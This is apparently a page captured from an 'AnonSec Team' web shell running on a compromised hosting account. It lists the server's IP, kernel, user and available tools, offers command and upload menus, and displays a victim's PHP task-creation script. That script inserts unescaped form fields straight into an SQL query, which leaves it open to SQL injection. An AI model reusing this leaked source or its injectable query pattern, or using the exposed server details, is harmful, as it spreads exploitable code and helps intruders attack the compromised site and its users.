AnonSec Team
Server IP : 10.128.40.6  /  Your IP : 216.73.216.233
Web Server : Apache
System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : logmcpe ( 111175)
PHP Version : 7.3.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/logmcpe/www/mcg/pages/feuillesroute/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/logmcpe/www/mcg/pages/feuillesroute/../file_tache.php
<?php 


  $page = $_SERVER['PHP_SELF'] ; 
  
  // if(!empty($_POST)){
  
  // echo "<pre>" ; 
  // print_r($_POST) ;
  // echo "</pre>" ; 
  // exit() ; 
  // }

  if($_POST['cree_tache']== 'cree_tache')
			 {

 
 if(!empty($_POST['tache_date_fin']))
						{ 
 $tache_date_fin= dateformaint($_POST['tache_date_fin']) ;
						}
          
		  $date_creation = date("Ymd");  
		  
						$tache_sujet=addslashes($_POST['tache_sujet']) ; 
						$tache_Priorite=$_POST['tache_Priorite'] ;  
						$salarie_id=$_POST['salarie_id'] ; 
						$client_id=$_POST['client_id'] ; 
						$user_id = $_SESSION['MCPRO']['login']['4'] ; 
						$tache_designation=addslashes($_POST['tache_designation']) ;
	                    $tache_titre_id=$_POST['tache_titre_id'] ;
					
					dbi_query(" INSERT INTO  tache (
					tache_sujet, 
					tache_date_fin,
					tache_Priorite, 
					salarie_id,	
					client_id,	 
					user_id,
					tache_titre_id,
			
					date_creation
 )
 VALUES 
 (
 
 '$tache_sujet',
 '$tache_date_fin',
 '$tache_Priorite',
 '$salarie_id',
 '$client_id',
 '$user_id',
 '$tache_titre_id',
 '$date_creation'
 
)") ;


// header("Location:".$_SERVER['PHP_SELF']."?msg=tache bien ajouté&color=success&page=tache&rowid=$tache_idd");
list($tache_idd)=dbi_fetch_row(dbi_query("SELECT max(tache_id) FROM `tache`")) ;
header("Location:fetch_record2.php?msg=tache bien ajouté&color=success&page=$page&rowid=$tache_idd");

			 }
 
 
?>

AnonSec - 2021